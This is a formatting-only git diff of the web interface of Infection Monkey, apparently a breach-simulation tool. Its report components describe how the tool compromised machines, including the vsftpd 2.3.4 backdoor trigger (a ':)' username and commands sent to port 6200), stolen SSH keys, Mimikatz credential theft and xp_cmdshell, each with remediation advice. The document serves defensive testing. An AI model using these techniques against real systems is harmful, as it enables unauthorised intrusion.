Monkey Telemetry - diff --git a/monkey/monkey_island/cc/ui/src/components/pages/PassTheHashMapPage.js b/monkey/monkey_island/cc/ui/src/components/pages/PassTheHashMapPage.js index 20faafca7..66dc7e089 100644 --- a/monkey/monkey_island/cc/ui/src/components/pages/PassTheHashMapPage.js +++ b/monkey/monkey_island/cc/ui/src/components/pages/PassTheHashMapPage.js @@ -29,15 +29,13 @@ class PassTheHashMapPageComponent extends AuthComponent { return node['id'] === event.nodes[0]; }); this.setState({selected: displayedNode, selectedType: 'node'}) - } - else if (event.edges.length === 1) { + } else if (event.edges.length === 1) { let displayedEdge = this.state.graph.edges.find( function (edge) { return edge['id'] === event.edges[0]; }); - this.setState({selected: displayedEdge, selectedType: 'edge'}); - } - else { + this.setState({selected: displayedEdge, selectedType: 'edge'}); + } else { this.setState({selected: null, selectedType: null}); } } diff --git a/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js b/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js index 68ba84aa6..c3b538c70 100644 --- a/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js +++ b/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js @@ -135,19 +135,21 @@ class ReportPageComponent extends AuthComponent { } else { content =
- {this.generateReportOverviewSection()} - {this.generateReportFindingsSection()} - {this.generateReportRecommendationsSection()} - {this.generateReportGlanceSection()} - {this.generateAttackSection()} - {this.generateReportFooter()} + {this.generateReportOverviewSection()} + {this.generateReportFindingsSection()} + {this.generateReportRecommendationsSection()} + {this.generateReportGlanceSection()} + {this.generateAttackSection()} + {this.generateReportFooter()}
; } return (
- {print();}} /> + { + print(); + }}/>
@@ -155,7 +157,9 @@ class ReportPageComponent extends AuthComponent { {content}
- {print();}} /> + { + print(); + }}/>
); @@ -269,14 +273,14 @@ class ReportPageComponent extends AuthComponent { return x === true; }).length > 0 ?
- During this simulated attack the Monkey uncovered {this.state.report.overview.issues.filter(function (x) { return x === true; }).length} threats:
    {this.state.report.overview.issues[this.Issue.STOLEN_SSH_KEYS] ? -
  • Stolen SSH keys are used to exploit other machines.
  • : null } +
  • Stolen SSH keys are used to exploit other machines.
  • : null} {this.state.report.overview.issues[this.Issue.STOLEN_CREDS] ?
  • Stolen credentials are used to exploit other machines.
  • : null} {this.state.report.overview.issues[this.Issue.ELASTIC] ? @@ -309,15 +313,16 @@ class ReportPageComponent extends AuthComponent { {this.state.report.overview.issues[this.Issue.STRUTS2] ?
  • Struts2 servers are vulnerable to remote code execution. ( - CVE-2017-5638)
  • : null } + CVE-2017-5638) : null} {this.state.report.overview.issues[this.Issue.WEBLOGIC] ? -
  • Oracle WebLogic servers are susceptible to a remote code execution vulnerability.
  • : null } +
  • Oracle WebLogic servers are susceptible to a remote code execution vulnerability.
  • : null} {this.state.report.overview.issues[this.Issue.HADOOP] ? -
  • Hadoop/Yarn servers are vulnerable to remote code execution.
  • : null } +
  • Hadoop/Yarn servers are vulnerable to remote code execution.
  • : null} {this.state.report.overview.issues[this.Issue.PTH_CRIT_SERVICES_ACCESS] ? -
  • Mimikatz found login credentials of a user who has admin access to a server defined as critical.
  • : null } +
  • Mimikatz found login credentials of a user who has admin access to a server defined as + critical.
  • : null} {this.state.report.overview.issues[this.Issue.MSSQL] ? -
  • MS-SQL servers are vulnerable to remote code execution via xp_cmdshell command.
  • : null } +
  • MS-SQL servers are vulnerable to remote code execution via xp_cmdshell command.
  • : null}
: @@ -344,7 +349,8 @@ class ReportPageComponent extends AuthComponent { {this.state.report.overview.warnings[this.Warning.TUNNEL] ?
  • Weak segmentation - Machines were able to communicate over unused ports.
  • : null} {this.state.report.overview.warnings[this.Warning.SHARED_LOCAL_ADMIN] ? -
  • Shared local administrator account - Different machines have the same account as a local administrator.
  • : null} +
  • Shared local administrator account - Different machines have the same account as a local + administrator.
  • : null} {this.state.report.overview.warnings[this.Warning.SHARED_PASSWORDS] ?
  • Multiple users have the same password
  • : null} @@ -355,7 +361,7 @@ class ReportPageComponent extends AuthComponent {
    }
    - { this.state.report.overview.cross_segment_issues.length > 0 ? + {this.state.report.overview.cross_segment_issues.length > 0 ?

    Segmentation Issues @@ -380,14 +386,14 @@ class ReportPageComponent extends AuthComponent { {/* Checks if there are any domain issues. If there are more then one: render the title. Otherwise, * don't render it (since the issues themselves will be empty. */} {Object.keys(this.state.report.recommendations.domain_issues).length !== 0 ? -

    Domain related recommendations

    : null } +

    Domain related recommendations

    : null}
    {this.generateIssues(this.state.report.recommendations.domain_issues)}
    {/* Checks if there are any issues. If there are more then one: render the title. Otherwise, * don't render it (since the issues themselves will be empty. */} {Object.keys(this.state.report.recommendations.issues).length !== 0 ? -

    Machine related recommendations

    : null } +

    Machine related recommendations

    : null}
    {this.generateIssues(this.state.report.recommendations.issues)}
    @@ -444,13 +450,13 @@ class ReportPageComponent extends AuthComponent {
    - {this.generateReportPthMap()} + {this.generateReportPthMap()}
    - +
    ); @@ -463,33 +469,35 @@ class ReportPageComponent extends AuthComponent { Credentials Map

    - This map visualizes possible attack paths through the network using credential compromise. Paths represent lateral movement opportunities by attackers. + This map visualizes possible attack paths through the network using credential compromise. Paths represent lateral + movement opportunities by attackers.

    Legend: - Access credentials | + Access credentials |
    - +
    -
    +
    ); } generateAttackSection() { return (
    -

    - ATT&CK report -

    -

    - This report shows information about ATT&CK techniques used by Infection Monkey. -

    -
    - -
    -
    -
    ) +

    + ATT&CK report +

    +

    + This report shows information about ATT&CK techniques used by Infection Monkey. +

    +
    + +
    +
    +
    ) } generateReportFooter() { @@ -510,22 +518,22 @@ class ReportPageComponent extends AuthComponent { generateCrossSegmentIssue(crossSegmentIssue) { return
  • {'Communication possible from ' + crossSegmentIssue['source_subnet'] + ' to ' + crossSegmentIssue['target_subnet']} - -
      - {crossSegmentIssue['issues'].map(x => - x['is_self'] ? -
    • - {'Machine ' + x['hostname'] + ' has both ips: ' + x['source'] + ' and ' + x['target']} -
    • - : -
    • - {'IP ' + x['source'] + ' (' + x['hostname'] + ') connected to IP ' + x['target'] - + ' using the services: ' + Object.keys(x['services']).join(', ')} -
    • - )} -
    -
    -
  • ; + +
      + {crossSegmentIssue['issues'].map(x => + x['is_self'] ? +
    • + {'Machine ' + x['hostname'] + ' has both ips: ' + x['source'] + ' and ' + x['target']} +
    • + : +
    • + {'IP ' + x['source'] + ' (' + x['hostname'] + ') connected to IP ' + x['target'] + + ' using the services: ' + Object.keys(x['services']).join(', ')} +
    • + )} +
    +
    + ; } generateShellshockPathListBadges(paths) { @@ -619,18 +627,18 @@ class ReportPageComponent extends AuthComponent { generateSshKeysIssue(issue) { return ( -
  • - Protect {issue.ssh_key} private key with a pass phrase. - - The machine {issue.machine} ({issue.ip_address}) is vulnerable to a SSH attack. -
    - The Monkey authenticated over the SSH protocol with private key {issue.ssh_key}. -
    -
  • - ); +
  • + Protect {issue.ssh_key} private key with a pass phrase. + + The machine {issue.machine} ({issue.ip_address}) is vulnerable to a SSH attack. +
    + The Monkey authenticated over the SSH protocol with private key {issue.ssh_key}. +
    +
  • + ); } @@ -660,17 +668,20 @@ class ReportPageComponent extends AuthComponent { Update your VSFTPD server to the latest version vsftpd-3.0.3. The machine {issue.machine} ({issue.ip_address}) has a backdoor running at port {issue.ip_address}) has a backdoor running at port 6200.
    The attack was made possible because the VSFTPD server was not patched against CVE-2011-2523. -

    In July 2011, it was discovered that vsftpd version 2.3.4 downloadable from the master site had been compromised. - Users logging into a compromised vsftpd-2.3.4 server may issue a ":)" smileyface as the username and gain a command shell on port 6200. +

    In July 2011, it was discovered that vsftpd version 2.3.4 downloadable from the master site had been + compromised. + Users logging into a compromised vsftpd-2.3.4 server may issue a ":)" smileyface as the username and gain a command + shell on port 6200.

    - The Monkey executed commands by first logging in with ":)" in the username and then sending commands to the backdoor at port 6200. + The Monkey executed commands by first logging in with ":)" in the username and then sending commands to the backdoor + at port 6200.

    Read more about the security issue and remediation here. + href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523" + >here.
    ); @@ -716,8 +727,8 @@ class ReportPageComponent extends AuthComponent { Credentials could be stolen from {issue.machine} for the following users {issue.users}. Read more about the security issue and remediation here. + href="https://www.guardicore.com/2018/03/recovering-plaintext-passwords-azure/" + >here. ); @@ -756,11 +767,11 @@ class ReportPageComponent extends AuthComponent { generateSharedCredsDomainIssue(issue) { return ( -
  • +
  • Some domain users are sharing passwords, this should be fixed by changing passwords. These users are sharing access password: - {this.generateInfoBadges(issue.shared_with)}. + {this.generateInfoBadges(issue.shared_with)}.
  • ); @@ -768,11 +779,11 @@ class ReportPageComponent extends AuthComponent { generateSharedCredsIssue(issue) { return ( -
  • +
  • Some users are sharing passwords, this should be fixed by changing passwords. These users are sharing access password: - {this.generateInfoBadges(issue.shared_with)}. + {this.generateInfoBadges(issue.shared_with)}.
  • ); @@ -780,8 +791,9 @@ class ReportPageComponent extends AuthComponent { generateSharedLocalAdminsIssue(issue) { return ( -
  • - Make sure the right administrator accounts are managing the right machines, and that there isn’t an unintentional local admin sharing. +
  • + Make sure the right administrator accounts are managing the right machines, and that there isn’t an unintentional local + admin sharing. Here is a list of machines which the account {issue.username} is defined as an administrator: @@ -793,13 +805,13 @@ class ReportPageComponent extends AuthComponent { generateStrongUsersOnCritIssue(issue) { return ( -
  • +
  • This critical machine is open to attacks via strong users with access to it. The services: {this.generateInfoBadges(issue.services)} have been found on the machine thus classifying it as a critical machine. These users has access to it: - {this.generateInfoBadges(issue.threatening_users)}. + {this.generateInfoBadges(issue.threatening_users)}.
  • ); @@ -829,8 +841,8 @@ class ReportPageComponent extends AuthComponent {
    The attack was made possible because the server is using an old version of Jakarta based file upload Multipart parser. For possible work-arounds and more info read here. + href="https://cwiki.apache.org/confluence/display/WW/S2-045" + >here. ); @@ -856,7 +868,8 @@ class ReportPageComponent extends AuthComponent { generateHadoopIssue(issue) { return (
  • - Run Hadoop in secure mode ( + Run Hadoop in secure mode ( add Kerberos authentication). The Hadoop server at {issue.machine} ( Disable the xp_cmdshell option. @@ -880,8 +893,8 @@ generateMSSQLIssue(issue) {
    The attack was made possible because the target machine used an outdated MSSQL server configuration allowing the usage of the xp_cmdshell command. To learn more about how to disable this feature, read - Microsoft's documentation. + href="https://docs.microsoft.com/en-us/sql/database-engine/configure-windows/xp-cmdshell-server-configuration-option?view=sql-server-2017"> + Microsoft's documentation.
  • ); diff --git a/monkey/monkey_island/cc/ui/src/components/pages/RunMonkeyPage.js b/monkey/monkey_island/cc/ui/src/components/pages/RunMonkeyPage.js index 1008199fc..57373b2f7 100644 --- a/monkey/monkey_island/cc/ui/src/components/pages/RunMonkeyPage.js +++ b/monkey/monkey_island/cc/ui/src/components/pages/RunMonkeyPage.js @@ -1,5 +1,5 @@ import React from 'react'; -import { css } from '@emotion/core'; +import {css} from '@emotion/core'; import {Button, Col, Well, Nav, NavItem, Collapse} from 'react-bootstrap'; import CopyToClipboard from 'react-copy-to-clipboard'; import GridLoader from 'react-spinners/GridLoader'; @@ -35,7 +35,7 @@ class RunMonkeyPageComponent extends AuthComponent { isLoadingAws: true, isErrorWhileCollectingAwsMachines: false, awsMachineCollectionErrorMsg: '' - }; + }; } componentDidMount() { @@ -48,7 +48,7 @@ class RunMonkeyPageComponent extends AuthComponent { this.authFetch('/api/local-monkey') .then(res => res.json()) - .then(res =>{ + .then(res => { if (res['is_running']) { this.setState({runningOnIslandState: 'running'}); } else { @@ -75,7 +75,7 @@ class RunMonkeyPageComponent extends AuthComponent { fetchAwsInfo() { return this.authFetch('/api/remote-monkey?action=list_aws') .then(res => res.json()) - .then(res =>{ + .then(res => { let is_aws = res['is_aws']; if (is_aws) { // On AWS! 
@@ -83,7 +83,12 @@ class RunMonkeyPageComponent extends AuthComponent { let is_error_while_collecting_aws_machines = (res['error'] != null); if (is_error_while_collecting_aws_machines) { // There was an error. Finish loading, and display error message. - this.setState({isOnAws: true, isErrorWhileCollectingAwsMachines: true, awsMachineCollectionErrorMsg: res['error'], isLoadingAws: false}); + this.setState({ + isOnAws: true, + isErrorWhileCollectingAwsMachines: true, + awsMachineCollectionErrorMsg: res['error'], + isLoadingAws: false + }); } else { // No error! Finish loading and display machines for user this.setState({isOnAws: true, awsMachines: res['instances'], isLoadingAws: false}); @@ -138,7 +143,7 @@ class RunMonkeyPageComponent extends AuthComponent { cmdText = RunMonkeyPageComponent.generateWindowsCmd(this.state.selectedIp, is32Bit); } return ( - +
    ) } + render() { return ( @@ -281,9 +291,9 @@ class RunMonkeyPageComponent extends AuthComponent { { // TODO: implement button functionality @@ -302,7 +312,8 @@ class RunMonkeyPageComponent extends AuthComponent { OR

    -

    @@ -323,7 +334,7 @@ class RunMonkeyPageComponent extends AuthComponent { style={{'marginBottom': '2em'}}> {this.state.ips.map(ip => {ip})} - :
    + :
    }

    Copy the following command to your machine and run it with Administrator or root privileges. @@ -344,7 +355,7 @@ class RunMonkeyPageComponent extends AuthComponent { />

    - : null + : null } { this.state.isOnAws ? @@ -357,7 +368,8 @@ class RunMonkeyPageComponent extends AuthComponent { { this.state.isOnAws ?

    -

    @@ -370,9 +382,12 @@ class RunMonkeyPageComponent extends AuthComponent {

    - Error while collecting AWS machine data. Error message: {this.state.awsMachineCollectionErrorMsg}
    + Error while collecting AWS machine data. Error + message: {this.state.awsMachineCollectionErrorMsg}
    Are you sure you've set the correct role on your Island AWS machine?
    - Not sure what this is? Read the documentation! + Not sure what this is? Read + the documentation!

    : diff --git a/monkey/monkey_island/cc/ui/src/components/pages/StartOverPage.js b/monkey/monkey_island/cc/ui/src/components/pages/StartOverPage.js index c44a5a72f..eca159133 100644 --- a/monkey/monkey_island/cc/ui/src/components/pages/StartOverPage.js +++ b/monkey/monkey_island/cc/ui/src/components/pages/StartOverPage.js @@ -29,7 +29,9 @@ class StartOverPageComponent extends AuthComponent { return ( this.setState({showCleanDialog: false})}> -

    Reset environment

    +

    +
    Reset environment
    +

    Are you sure you want to reset the environment?

    @@ -40,7 +42,7 @@ class StartOverPageComponent extends AuthComponent { Some monkeys are still running. It's advised to kill all monkeys before resetting.
    : -
    +
    }
    @@ -86,7 +89,7 @@ class StartOverPageComponent extends AuthComponent { You can continue and Run More Monkeys as you wish, and see the results on the Infection Map without deleting anything.
    - { this.state.cleaned ? + {this.state.cleaned ?
    Environment was reset successfully @@ -106,8 +109,8 @@ class StartOverPageComponent extends AuthComponent { .then(res => { if (res['status'] === 'OK') { this.setState({ - cleaned: true - }); + cleaned: true + }); } }); } diff --git a/monkey/monkey_island/cc/ui/src/components/pages/TelemetryPage.js b/monkey/monkey_island/cc/ui/src/components/pages/TelemetryPage.js index 120344eea..27fb50cd0 100644 --- a/monkey/monkey_island/cc/ui/src/components/pages/TelemetryPage.js +++ b/monkey/monkey_island/cc/ui/src/components/pages/TelemetryPage.js @@ -5,14 +5,14 @@ import {DataTable} from 'react-data-components'; import AuthComponent from '../AuthComponent'; import download from 'downloadjs' -const renderJson = (val) => ; +const renderJson = (val) => ; const renderTime = (val) => val.split('.')[0]; const columns = [ - { title: 'Time', prop: 'timestamp', render: renderTime}, - { title: 'Monkey', prop: 'monkey'}, - { title: 'Type', prop: 'telem_catagory'}, - { title: 'Details', prop: 'data', render: renderJson, width: '40%' } + {title: 'Time', prop: 'timestamp', render: renderTime}, + {title: 'Monkey', prop: 'monkey'}, + {title: 'Type', prop: 'telem_catagory'}, + {title: 'Details', prop: 'data', render: renderJson, width: '40%'} ]; class TelemetryPageComponent extends AuthComponent { @@ -29,7 +29,7 @@ class TelemetryPageComponent extends AuthComponent { .then(res => this.setState({data: res.objects})); }; -downloadIslandLog = () => { + downloadIslandLog = () => { this.authFetch('/api/log/island/download') .then(res => res.json()) .then(res => { @@ -37,39 +37,39 @@ downloadIslandLog = () => { let logContent = (res['log_file']); download(logContent, filename, 'text/plain'); }); - }; + }; render() { return ( -
    - -

    Log

    -
    - -
    - -
    -
    - -

    Monkey Island Logs

    -
    -

    Download Monkey Island internal log file

    - -
    - + Download +
    + +
    -
    ); } } diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/common/PaginatedTable.js b/monkey/monkey_island/cc/ui/src/components/report-components/common/PaginatedTable.js index 5bc6183fd..c5300f657 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/common/PaginatedTable.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/common/PaginatedTable.js @@ -18,8 +18,7 @@ class PaginatedTable extends Component { />
    ); - } - else { + } else { return (
    ); diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/security/AttackReport.js b/monkey/monkey_island/cc/ui/src/components/report-components/security/AttackReport.js index 13f9cd92e..92dac6cff 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/security/AttackReport.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/security/AttackReport.js @@ -100,9 +100,9 @@ class AttackReportPageComponent extends AuthComponent { } onToggle = technique => - this.setState(state => ({ collapseOpen: state.collapseOpen === technique ? null : technique })); + this.setState(state => ({collapseOpen: state.collapseOpen === technique ? null : technique})); - getComponentClass(tech_id){ + getComponentClass(tech_id) { switch (this.state.report[tech_id].status) { case ScanStatus.SCANNED: return 'collapse-info'; @@ -113,9 +113,9 @@ class AttackReportPageComponent extends AuthComponent { } } - getTechniqueCollapse(tech_id){ + getTechniqueCollapse(tech_id) { return ( -
    +
    @@ -146,23 +146,23 @@ class AttackReportPageComponent extends AuthComponent { } renderLegend() { - return( ) + return () } - generateReportContent(){ + generateReportContent() { let content = []; Object.keys(this.state.report).forEach((tech_id) => { content.push(this.getTechniqueCollapse(tech_id)) @@ -177,15 +177,14 @@ class AttackReportPageComponent extends AuthComponent { render() { let content; - if (! this.state.runStarted) - { + if (!this.state.runStarted) { content =

    You have to run a monkey before generating a report!

    ; - } else if (this.state.report === false){ - content = (

    Generating Report...

    ); + } else if (this.state.report === false) { + content = (

    Generating Report...

    ); } else if (Object.keys(this.state.report).length === 0) { if (this.state.runStarted) { content = (

    No techniques were scanned

    ); @@ -193,7 +192,7 @@ class AttackReportPageComponent extends AuthComponent { } else { content = this.generateReportContent(); } - return (
    {content}
    ); + return (
    {content}
    ); } } diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/security/BreachedServers.js b/monkey/monkey_island/cc/ui/src/components/report-components/security/BreachedServers.js index 16f445ce9..b1dc64f62 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/security/BreachedServers.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/security/BreachedServers.js @@ -1,7 +1,7 @@ import React from 'react'; import ReactTable from 'react-table' -let renderArray = function(val) { +let renderArray = function (val) { return
    {val.map(x =>
    {x}
    )}
    ; }; @@ -14,10 +14,12 @@ const columns = [ Header: 'Breached Servers', columns: [ {Header: 'Machine', accessor: 'label'}, - {Header: 'IP Addresses', id: 'ip_addresses', - accessor: x => renderIpAddresses(x)}, + { + Header: 'IP Addresses', id: 'ip_addresses', + accessor: x => renderIpAddresses(x) + }, {Header: 'Exploits', id: 'exploits', accessor: x => renderArray(x.exploits)} - ] + ] } ]; diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/security/PostBreach.js b/monkey/monkey_island/cc/ui/src/components/report-components/security/PostBreach.js index ea39e3c45..ebbc473f8 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/security/PostBreach.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/security/PostBreach.js @@ -1,7 +1,7 @@ import React from 'react'; import ReactTable from 'react-table' -let renderArray = function(val) { +let renderArray = function (val) { return {val.map(x => {x})}; }; @@ -15,36 +15,36 @@ let renderMachine = function (data) { let renderPbaResults = function (results) { let pbaClass = ""; - if (results[1]){ - pbaClass="pba-success" + if (results[1]) { + pbaClass = "pba-success" } else { - pbaClass="pba-danger" + pbaClass = "pba-danger" } return
    {results[0]}
    }; const subColumns = [ - {id: 'pba_name', Header: "Name", accessor: x => x.name, style: { 'whiteSpace': 'unset' }, width: 160}, - {id: 'pba_output', Header: "Output", accessor: x => renderPbaResults(x.result), style: { 'whiteSpace': 'unset' }} + {id: 'pba_name', Header: "Name", accessor: x => x.name, style: {'whiteSpace': 'unset'}, width: 160}, + {id: 'pba_output', Header: "Output", accessor: x => renderPbaResults(x.result), style: {'whiteSpace': 'unset'}} ]; let renderDetails = function (data) { let defaultPageSize = data.length > pageSize ? pageSize : data.length; let showPagination = data.length > pageSize; return + data={data} + columns={subColumns} + defaultPageSize={defaultPageSize} + showPagination={showPagination} + style={{"backgroundColor": "#ededed"}} + /> }; const columns = [ { Header: 'Post breach actions', columns: [ - {id: 'pba_machine', Header:'Machine', accessor: x => renderMachine(x)} + {id: 'pba_machine', Header: 'Machine', accessor: x => renderMachine(x)} ] } ]; @@ -57,8 +57,8 @@ class PostBreachComponent extends React.Component { } render() { - let pbaMachines = this.props.data.filter(function(value, index, arr){ - return ( value.pba_results !== "None" && value.pba_results.length > 0); + let pbaMachines = this.props.data.filter(function (value, index, arr) { + return (value.pba_results !== "None" && value.pba_results.length > 0); }); let defaultPageSize = pbaMachines.length > pageSize ? pageSize : pbaMachines.length; let showPagination = pbaMachines > pageSize; diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/security/ScannedServers.js b/monkey/monkey_island/cc/ui/src/components/report-components/security/ScannedServers.js index 57418e415..585e6af37 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/security/ScannedServers.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/security/ScannedServers.js 
@@ -1,7 +1,7 @@ import React from 'react'; import ReactTable from 'react-table' -let renderArray = function(val) { +let renderArray = function (val) { return
    {val.map(x =>
    {x}
    )}
    ; }; @@ -13,11 +13,13 @@ const columns = [ { Header: 'Scanned Servers', columns: [ - { Header: 'Machine', accessor: 'label'}, - { Header: 'IP Addresses', id: 'ip_addresses', - accessor: x => renderIpAddresses(x)}, - { Header: 'Accessible From', id: 'accessible_from_nodes', accessor: x => renderArray(x.accessible_from_nodes)}, - { Header: 'Services', id: 'services', accessor: x => renderArray(x.services)} + {Header: 'Machine', accessor: 'label'}, + { + Header: 'IP Addresses', id: 'ip_addresses', + accessor: x => renderIpAddresses(x) + }, + {Header: 'Accessible From', id: 'accessible_from_nodes', accessor: x => renderArray(x.accessible_from_nodes)}, + {Header: 'Services', id: 'services', accessor: x => renderArray(x.services)} ] } ]; diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/security/StolenPasswords.js b/monkey/monkey_island/cc/ui/src/components/report-components/security/StolenPasswords.js index fde46f85a..25a701871 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/security/StolenPasswords.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/security/StolenPasswords.js @@ -5,9 +5,9 @@ const columns = [ { Header: 'Stolen Credentials', columns: [ - { Header: 'Username', accessor: 'username'}, - { Header: 'Type', accessor: 'type'}, - { Header: 'Stolen From', accessor: 'origin'} + {Header: 'Username', accessor: 'username'}, + {Header: 'Type', accessor: 'type'}, + {Header: 'Stolen From', accessor: 'origin'} ] } ]; diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/security/StrongUsers.js b/monkey/monkey_island/cc/ui/src/components/report-components/security/StrongUsers.js index a8f045479..2c2a79c07 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/security/StrongUsers.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/security/StrongUsers.js 
@@ -1,7 +1,7 @@ import React from 'react'; import ReactTable from 'react-table' -let renderArray = function(val) { +let renderArray = function (val) { console.log(val); return
    {val.map(x =>
    {x}
    )}
    ; }; @@ -10,9 +10,9 @@ const columns = [ { Header: 'Powerful Users', columns: [ - { Header: 'Username', accessor: 'username'}, - { Header: 'Machines', id: 'machines', accessor: x => renderArray(x.machines)}, - { Header: 'Services', id: 'services', accessor: x => renderArray(x.services_names)} + {Header: 'Username', accessor: 'username'}, + {Header: 'Machines', id: 'machines', accessor: x => renderArray(x.machines)}, + {Header: 'Services', id: 'services', accessor: x => renderArray(x.services_names)} ] } ]; diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/EventsButton.js b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/EventsButton.js index 761ff94a9..49905531c 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/EventsButton.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/EventsButton.js @@ -21,13 +21,13 @@ export default class EventsButton extends Component { render() { return - -
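Review bot: The `renderArray` hunk in StrongUsers.js reformats the function signature but keeps the `console.log(val);` directly beneath it, which looks like a leftover debug statement: it writes every "Machines"/"Services" cell value to the browser console on each render, and the sibling `renderArray` helpers in BreachedServers.js and ScannedServers.js in this same commit have no such call. I would delete `console.log(val);` here so the three helpers are identical. If the logging is intentional, a short comment saying why this table alone logs its rows would help the next reader.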
    - -
    + +
    + +
    ; } diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/EventsModal.js b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/EventsModal.js index a7f2fe41c..2f56c7a76 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/EventsModal.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/EventsModal.js @@ -20,9 +20,11 @@ export default class EventsModal extends Component {

    Events

    -
    +

    - There {Pluralize('is', this.props.events.length)} {

    {this.props.events.length}
    } {Pluralize('event', this.props.events.length)} associated with this finding. + There {Pluralize('is', this.props.events.length)} {
    {this.props.events.length}
    } {Pluralize('event', this.props.events.length)} associated + with this finding.

    {this.props.events.length > 5 ? this.renderButtons() : null} diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/EventsTimeline.js b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/EventsTimeline.js index b7fb90811..e124b6659 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/EventsTimeline.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/EventsTimeline.js @@ -22,8 +22,8 @@ export default class EventsTimeline extends Component { key={index} createdAt={event_time} title={event.title} - icon={icon}> - {event.message} + icon={icon}> + {event.message} ) }) } diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/PillarLabel.js b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/PillarLabel.js index 51c5ca380..2eb839504 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/PillarLabel.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/PillarLabel.js @@ -15,7 +15,8 @@ const pillarToIcon = { export default class PillarLabel extends Component { render() { const className = "label " + statusToLabelType[this.props.status]; - return
    {this.props.pillar}
    + return
    {this.props.pillar}
    } } diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/PrinciplesStatusTable.js b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/PrinciplesStatusTable.js index b50ee0c28..6db2dfad3 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/PrinciplesStatusTable.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/PrinciplesStatusTable.js @@ -10,19 +10,22 @@ const MAX_WIDTH_STATUS_COLUMN = 80; const columns = [ { columns: [ - { Header: 'Status', id: 'status', + { + Header: 'Status', id: 'status', accessor: x => { - return ; + return ; }, maxWidth: MAX_WIDTH_STATUS_COLUMN }, - { Header: 'Zero Trust Principle', accessor: 'principle', + { + Header: 'Zero Trust Principle', accessor: 'principle', style: {'whiteSpace': 'unset'} // This enables word wrap }, - { Header: 'Monkey Tests', id: 'tests', + { + Header: 'Monkey Tests', id: 'tests', style: {'whiteSpace': 'unset'}, // This enables word wrap accessor: x => { - return ; + return ; } } ] diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/ReportLegend.js b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/ReportLegend.js index 5ef75f2b4..0820fe3a6 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/ReportLegend.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/ReportLegend.js @@ -13,7 +13,7 @@ class ZeroTrustReportLegend extends Component { -

    Legend

    +

    Legend

    @@ -32,7 +32,8 @@ class ZeroTrustReportLegend extends Component {
    - {"\t"}At least one of the tests related to this component failed. This means that the Infection Monkey detected an unmet Zero Trust requirement. + {"\t"}At least one of the tests related to this component failed. This means that the Infection Monkey detected an + unmet Zero Trust requirement.
  • @@ -50,7 +51,8 @@ class ZeroTrustReportLegend extends Component {
    - {"\t"}This status means the test wasn't executed.To activate more tests, refer to the Monkey configuration page. + {"\t"}This status means the test wasn't executed.To activate more tests, refer to the Monkey configuration page.
  • ; diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/SinglePillarPrinciplesStatus.js b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/SinglePillarPrinciplesStatus.js index 8e4512ac7..8de7a4d21 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/SinglePillarPrinciplesStatus.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/SinglePillarPrinciplesStatus.js @@ -9,14 +9,14 @@ export default class SinglePillarPrinciplesStatus extends AuthComponent { render() { if (this.props.principlesStatus.length === 0) { return null; - } - else { + } else { return (

    - +

    diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/StatusesToPillarsSummary.js b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/StatusesToPillarsSummary.js index d34a484b9..0002ba9e0 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/StatusesToPillarsSummary.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/StatusesToPillarsSummary.js @@ -21,11 +21,11 @@ export default class StatusesToPillarsSummary extends Component {
